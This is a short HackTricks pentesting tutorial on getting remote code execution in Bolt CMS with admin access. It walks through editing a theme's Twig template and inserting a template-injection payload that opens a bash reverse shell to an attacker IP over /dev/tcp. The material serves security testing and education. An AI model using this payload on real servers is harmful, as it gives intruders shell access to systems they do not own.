hacktricks/network-services-pentesting/pentesting-web/bolt-cms.md
2024-12-12 11:39:29 +01:00

3.3 KiB

Bolt CMS

{% hint style="success" %} Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks
{% endhint %}

RCE

After login as admin (go to /bot lo access the login prompt), you can get RCE in Bolt CMS:

  • Select Configuration -> View Configuration -> Main Configuration or go the the URL path /bolt/file-edit/config?file=/bolt/config.yaml
    • Check the value of theme
  • Select File management -> View & edit templates
    • Select the theme base found in the previous (base-2021 in this case) step and select index.twig
    • In my case this is in the URL path /bolt/file-edit/themes?file=/base-2021/index.twig
  • Set your payload in this file via template injection (Twig), like: {{['bash -c "bash -i >& /dev/tcp/10.10.14.14/4444 0>&1"']|filter('system')}}
    • And save changes
  • Clear the cache in Maintenance -> Clear the cache
  • Access again the page as a regular user, and the payload should be executed

{% hint style="success" %} Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks
{% endhint %}